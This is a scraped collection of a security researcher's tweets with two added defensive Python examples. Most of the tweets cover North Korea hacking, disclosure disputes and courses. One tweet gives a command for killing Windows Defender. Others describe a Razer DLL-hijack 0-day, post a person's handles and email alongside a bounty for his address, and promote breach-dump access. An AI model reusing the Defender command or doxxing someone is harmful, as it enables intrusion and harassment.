Owner of Hyperion Gray. Hacker. Former DARPA research tech lead. P4x. North Korea's sexiest man of the yr. AI/ML/Data/Kubernetes/Parallel Computing nerd. 0days.
I love the art here. Also wonderful being on the show. These folks are AMAZING journalists, professionals, and producers. Also super friendly and kind people. LOL I can't believe you all included the "Kim Jong Un's PC, Kim Jong Un's Porn Computer". Wonderful, truly. Thanks y'all
When North Korea hacked Alejandro Caceres (@_hyp3ri0n), he expected the U.S. government to rush to his defense. When they just shrugged, he took matters into his own hands.
LISTEN:
Hey folks, story time. A guy going by the name James Willy approached me about help with a 0-day. After providing a writeup on root cause analysis I realized the visual studio project he gave me was backdoored.
<-- Troy I have to be honest with you, HIBP has never sat right with me, and now even less. I'm the owner/creator of an *actual open data breach community* that aims to make selling data breaches worthless.
folks please help me get this word out.
@Crowdstrike named some ransomware PunkSpider, literally the name of one of the pieces of software I made. Completely unrelated of course, mine is a security tool.
This is NOT cool, appreciate RTs to get them to change this.
20k to anyone that gives me his full identity and address (and it's proven correct ofc). I will of course be approaching proper authorities at the DoD and LEA tomorrow. Thanks all.
he goes by the name James0x40 on twitter (now banned), @kw0dem on telegram, gmail is kvlpmap@gmail.com, and djokovic808 (maybe a tennis fan!?). Anyway, yes I was hacked. No, no customer information was leaked, this was on a private VM for this exact reason. Anyway I'm offering
@the_ens someone vetted by a friend sent me a visual studio project which I opened (not an executable, the executable in the project was a real 0-day vuln). And it was in a VM for that exact reason. And it's a scam a lot have been going down with rn. So chill.
@alexaaronpena oh, you don't know me :P. I just like fucking with people. If someone scans the site it'll throw false positives for sql injection, OS command injection, sensitive info leak, password on page, possibly some overflow something, and generally come back horrible. I think it's funny
Folks i’d like to announce that I AM OFFICIALLY DIVORCED. I’d like to thank everyone that made it happen including my ex wife and our lawyers. We gave it 110% and came out ahead, good job everyone.
Now who wants to date or some shit i don’t know how this works
Looking for good infosec courses and if i see another goddamn basic buffer overflow course or tutorial i'm gonna lose my shit. Any recommendations for intermediate level? Stuff like heap exploitation, kernel fuzzing, and such?
No SANS please, I don't currently have 1mil USD
Yep, he would've been 77 and still rocking those snakey improv solos and soothing voice :-/. What a great musician.
If you haven't had a chance to catch @deadandcompany shows or recordings highly recommend it. John Mayer slays the vocals and guitar and well Bob Weir is Bob Weir.
0day course is back in action January 31st! not for the faint of heart but tons of fun. Please note this is a *hacking* course not an infosec training so bring the right mindset :-)!! All are welcome!
@alexaaronpena i'm just lightly fucking with people :). Security sites always get attempted hacks so I play with the people that try. Last iteration if someone inserted an apostrophe it'd take them to a "there is an error in your sql query...." page. We didn't even use SQL. Good fun!
to make myself feel better here's a 0-day in Razer Synapse (the keyboard/mouse you get at best buy). Razer Synapse Service looks for a DLL in ProgramData that doesn't exist and is writable by low priv process (hid.dll). It runs as system. Hijack and boom.
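The condition the tweet describes (a SYSTEM service loading a DLL from a path that does not exist yet, in a directory ordinary users can write to) is checkable without any Razer-specific knowledge. The helper below is an added example, not the tweet author's code or anything shipped by Razer: you pass it the search directory and DLL name you observed (for example with Procmon), and it reports whether the file is absent and whether the current, unprivileged user can actually create a file there. The fixture in demo() uses a temporary directory standing in for the service's search path.

```python
"""Is a missing DLL on a privileged service's load path plantable by a low-priv user?

Added example, not from the tweet. hijack_candidate() checks the two things the
tweet's bug needs: the DLL does not exist, and the directory it is looked up in
is writable by whoever runs this script. The directory and DLL name are inputs;
nothing here is hard-coded to Razer Synapse.
"""
import os
import sys
import tempfile


def hijack_candidate(search_dir: str, dll_name: str) -> dict:
    """Report whether `dll_name` under `search_dir` could be planted by this user.

    'plantable' is True only when the DLL is absent AND a real file create in the
    directory succeeds. The probe file is removed again immediately.
    """
    target = os.path.join(search_dir, dll_name)
    report = {
        "target": target,
        "exists": os.path.exists(target),
        "dir_present": os.path.isdir(search_dir),
        "writable": False,
    }
    if report["dir_present"]:
        try:
            # On Windows os.access() does not evaluate ACLs, so actually creating
            # a file is the only honest writability test.
            fd, probe = tempfile.mkstemp(prefix=".hijack-probe-", dir=search_dir)
            os.close(fd)
            os.remove(probe)
            report["writable"] = True
        except OSError:
            report["writable"] = False
    report["plantable"] = report["writable"] and not report["exists"]
    return report


def demo() -> dict:
    """Constructed fixture: a temp dir plays the service's search directory."""
    d = tempfile.mkdtemp(prefix="svc-search-")
    try:
        before = hijack_candidate(d, "hid.dll")["plantable"]
        # The vendor-side fix: ship the DLL, so the slot is no longer free.
        with open(os.path.join(d, "hid.dll"), "wb") as f:
            f.write(b"MZ")  # placeholder bytes, not a real DLL
        after = hijack_candidate(d, "hid.dll")["plantable"]
        return {"before": before, "after": after}
    finally:
        for name in os.listdir(d):
            os.remove(os.path.join(d, name))
        os.rmdir(d)


if __name__ == "__main__":
    # Usage: python check_hijack.py <search_dir> <dll_name>
    if len(sys.argv) == 3:
        print(hijack_candidate(sys.argv[1], sys.argv[2]))
    else:
        print(demo())
```

Run it as the low-privileged user, not as admin, or the writability answer is meaningless. It also only checks the one path you give it; whether the loader would pick up a copy elsewhere first is a separate search-order question. Two reasonable fixes on the vendor side are to ship the DLL so the path is never empty, or to lock the directory ACL so that only administrators can create files in it.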
our 0-day course is back in action:
Not a hard prereq but you should generally be able to sort of understand stuff at or at the very least have the will to learn it.
I turned a multimillion dollar company (HG) into something that produced enough to pay our people 275k a year. I took about half the salary of a McDonald's manager in the same area and gave my people more. I just want to note my fucking money is where my mouth is.
okay! thank you everyone for your support with the @CrowdStrike stuff. As a final update I'm done here on twitter with them and will be moving to comms with my IP lawyer. This is a clear violation of common law trademark and more, but I won't say much more. Just that your help
@Remroum Bill Maher is just an asshole. He likes playing the smart guy and making others look dumb (why I hated the movie Religulous even as a non-religious person). He clearly doesn't understand the medium and what it represents to so many.
wtaf 11,000 upvotes???????????? The TOP of AMA literally all day??????? I seriously thought it would hit like max 10 lol.
Does... does that mean you guys love me ❤️?
@hanno @esizkur it is well known. Visual studio even WARNS YOU to not open untrusted projects. But it was third-hand with a trusted party in between and I was just helping out with some analysis so I thought it was good. It was not.
@ez_ozel @DARPA @ambivalentricky hey I thought the same before I started working with them on counter human trafficking and counter a bunch of awful stuff online. Along with advancing CS massive amounts. I've never met anyone at DARPA that didn't have their head in the right place. And they're OSS pioneers!
@JC_SoCal FS-ISAC, it's a small con but bigger than I expected. Surprised about the speaker thing, they made me wait outside the con until my talk to go in.
Phew finally have something interesting to tweet... check out on how to fuzz GUI/GTK+ application w/ American Fuzzy Lop (AFL), the latest hawtness in fuzzers! Would love another pair of eyes from experienced folks like @lcamtuf and others who have used AFL
ok I posted an AMA on reddit, it’s probably going to get like 4 upvotes lol. But it’s there for anyone that wants to ask me anything about the NK Happenings
somebody just blocked me because "are you the person that keeps logging me out of my instagram?". I wish I was making that up. If I had the power to do that I'd log everyone out of their instagram. We are all logged out of insta on this blessed day.
Can I get RTs for Scylla? A project to provide FREE access to full db dumps to sec researchers, academics, gov't, etc. ONLY. No skiddies allowed, vetting is done on everyone, shoot me an email at acaceres@hyperiongray.com
anyone want to hire me as a CISO, here are my relevant skills:
(1) know about security
(2) hate managing people
(3) like ordering people around
(4) good at looking busy and always stressed
(5) Excellent gaslighting skills
Relevant experience:
(1) killing baby seals
When an appliance tells me that it's off, how do I know it's telling the truth? I mean it's off and can't report on its own state. I suspect my toaster is hiding something.
I had a funny convo today:
Me: Hey found a 0day in your shit, can you fix within 30 days? Can help, super simple.
X: No it will take 6 months AT LEAST
Me: OK I'm releasing the vuln in 14 days.
X: 30 days is more than enough, can we have 30 please?
@alessabcd @stark__tara my beautiful little Clonazepam. She has such a calming presence. Not like her hyperactive brother amphetamine/dextroamphetamine_salts.
i'm sorry but what the fuck OWASP? From your guide:
PunkSpider is web application vulnerability search engine. It is of little use for a penetration tester doing manual work. However it can be useful as demonstration of easiness of finding vulnerabilities by script-kiddies.
It's that time of month where I complain about @firefox ptrace protection. In Linux this means bypass of all protections available (tested on clean Ubuntu Linux).
You have weak ptrace perms. Here is a snippet of basic ptrace protection/1
src:
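What "basic ptrace protection" looks like from inside the process, as an added example (not Firefox code and not the snippet the tweet links to): on Linux, any process with the same uid can ptrace-attach to a "dumpable" process, read its memory and inject code, which is the "bypass of all protections" above. Clearing the dumpable flag with prctl(PR_SET_DUMPABLE, 0) makes the kernel refuse attach from non-root processes, and TracerPid in /proc/self/status shows whether someone is already attached. Linux-only; the prctl constants are the ones from <linux/prctl.h>, and libc is reached through ctypes because Python already has it mapped.

```python
"""Minimal same-uid ptrace-attach protection for a Linux process.

Added example, not from the tweet. Two pieces:
  tracer_pid()         - is a debugger already attached? (TracerPid in procfs)
  deny_ptrace_attach() - prctl(PR_SET_DUMPABLE, 0): non-root processes can no
                         longer ptrace-attach to us (unless Yama is set looser
                         than default and they hold CAP_SYS_PTRACE).
"""
import ctypes
import os

# Values from <linux/prctl.h>.
PR_GET_DUMPABLE = 3
PR_SET_DUMPABLE = 4

# dlopen(NULL): the interpreter already links libc, so prctl() is resolvable.
_libc = ctypes.CDLL(None, use_errno=True)
_libc.prctl.restype = ctypes.c_int
_libc.prctl.argtypes = [ctypes.c_int, ctypes.c_ulong, ctypes.c_ulong,
                        ctypes.c_ulong, ctypes.c_ulong]


def tracer_pid() -> int:
    """PID of the process ptrace-attached to us, or 0 if nobody is."""
    with open("/proc/self/status") as f:
        for line in f:
            if line.startswith("TracerPid:"):
                return int(line.split()[1])
    raise RuntimeError("no TracerPid line in /proc/self/status; not Linux procfs?")


def is_hardened() -> bool:
    """True once the dumpable flag is clear."""
    return _libc.prctl(PR_GET_DUMPABLE, 0, 0, 0, 0) == 0


def deny_ptrace_attach() -> int:
    """Clear the dumpable flag; returns the flag value afterwards (0 = protected).

    Side effects to plan for: core dumps are disabled and /proc/self/* becomes
    root-owned, so do this after anything that must read those files as the
    normal user, and before handling any secrets you care about.
    """
    if _libc.prctl(PR_SET_DUMPABLE, 0, 0, 0, 0) != 0:
        err = ctypes.get_errno()
        raise OSError(err, os.strerror(err))
    return _libc.prctl(PR_GET_DUMPABLE, 0, 0, 0, 0)


if __name__ == "__main__":
    print("tracer pid before:", tracer_pid())
    print("dumpable after hardening:", deny_ptrace_attach())
    # From here on: `gdb -p <this pid>` as the same user fails with EPERM.
```

This is per-process and cooperative; a program that does not do it (the complaint above) is left to the system-wide setting, kernel.yama.ptrace_scope, which on a default Ubuntu is 1 (only ancestors may attach) and can be raised to 2 or 3 by an administrator. A same-uid process that already holds an open descriptor or a parent relationship is a separate story, and anything running as root can still attach.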
This has to be a well-known trick in infosec right? One on the right is an executable and opens as such when double clicked.
First one to get how this was all done gets a free ABSOLUTELY NOTHING.
Got an LPE and want to kill Defender?
Command = <: mklink "C:\ProgramData\Microsoft\Windows Defender:wtf" \ :>
then restart it/kill it with driver from something like process hacker. Defender dead.
(greetz to anonymous person on discord for technique)
massive update to . It is now open without auth. If you missed that last db dump download check out . It's been updated to include the "Collection #1-5" dump and the EU Antipublic dump. Missed a db download? It's probably on there!
$ sudo apt install python3-pip p7zip p7zip-rar
$ sudo pip3 install dtrx
$ dtrx file_to_extract
You'll never have to remember any goddamn extraction flags ever again. dtrx extracts it automatically (and stands for Do The Right Extraction). Great little tool.
folks my apologies but I'm stumped. I have no idea why is down and I can't seem to figure it out. Normally I would but... no. I'll be reinstalling tomorrow (database is still fine)
@101010Mingdao @notshenetworks naw man some people don't know the nerdy shit we know because we do this professionally. Helping out folks like this, imo, is exactly what we're trying to do here. It's not sexy, it's not the next big sploit, but it's important.
honestly why do we ever have default user/pass on anything. Just make the user set a password or the install won't continue. Why do only super important networking devices and shit all have this default user/pass bullshit?
Announcing the official 1.0 release of mass scanner proj. by Hyperion Gray. Version includes 100+ nmap NSE scans, 100+ ports scanned and banner grabbed, and web scans with our new custom fuzzer. All searchable via faceted front-end! Check it out!
hello everybody! got a brand new search portal. Enjoy and please use responsibly. Umm interested parties may be @notdan @Viss @blackroomsec. RT if you got it folks and let me know if you find any bugs :).
dear @th3j35t3r, I wanted to apologize for the ugliness the other day. I was being a cocky asshole and it was a stressful time (which is no excuse but some context). We're on the same side and I hope we can continue to be. Much love.
- Alex
Dropchat is a safe, anonymous no-frills clientless chat application over Tor ephemeral hidden services. v1.1.2-alpha is officially released! It now has JS support (if you want it, works without js too) and improved user experience. check it out here!
this space (hacking/infosec) is scary because there’s always someone who is a million times better than you. Unless you’re Charlie Miller or something.
isn't it kinda bullshit that we tell everyone to lock things down defense in depth etc. yet most people use Kali Linux as root only (even for browsing!) to save from the headache of some tools working only as root
. <— shell32 API is fucking swiss cheese. 3 non responsibly disclosed 0 days here and more coming (bottom part where i fuzz it). Even more not coming and gonna get weaponized/sold ;-). I’ll rant tomorrow on why I fucking hate responsible disclosure
A tool we wrote that I actually use quite a bit: <-- allows you to go through tor then through another proxy, hiding the fact that you're coming from tor. This has saved me hours in doing recaptchas all day. Please use carefully.
“responsible” disclosure is fucking bullshit. There I said it. Keep doing other people’s jobs for them for free and they’ll never do it themselves.
Vulnerable products SHOULD get owned and therefore exit the market. Make them feel it in their wallets or nothing will change.